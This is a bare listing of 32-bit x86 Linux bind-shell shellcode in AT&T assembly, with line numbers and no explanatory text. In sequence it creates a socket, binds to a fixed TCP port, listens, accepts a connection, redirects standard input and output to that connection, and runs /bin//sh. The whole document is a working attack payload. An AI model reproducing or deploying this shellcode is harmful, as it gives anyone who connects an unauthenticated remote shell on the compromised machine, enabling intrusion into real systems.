1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
|
.globl cbegin
.globl cend
cbegin:
/* socket */
xorl %eax, %eax
cdq
push %eax
incb %al
movl %eax, %ebx
push %eax
incb %al
push %eax
movl %esp, %ecx
movb $0x66, %al
int $0x80
/* bind */
push %edx
pushw $0x7350
pushw %dx
movl %esp, %edx
push $0x10
push %edx
push %eax
movl %esp, %ecx
incb %bl
movl %eax, %edx
movb $0x66, %al
int $0x80
/* listen */
addb $0x02, %bl
movb $0x66, %al
int $0x80
/* accept */
push %eax
push %edx
movl %esp, %ecx
incb %bl
movb $0x66, %al
int $0x80
/* dup2 fd 0 + fd 1 */
movl %eax, %ebx
xorl %ecx, %ecx
movb $0x3f, %al
int $0x80
incb %cl
movb $0x3f, %al
int $0x80
/* execve shell (by lorian, see execve.s) - slightly modified */
movb $0x0b, %al
cdq
pushl %edx
/* push $0x68732F6E */
/* push $0x69622F2F */
pushw $0x6873
pushw $0x2f6e
pushw $0x6962
pushw $0x2f2f
movl %esp, %ebx
pushl %edx
pushl %ebx
movl %esp, %ecx
int $0x80
cend:
|
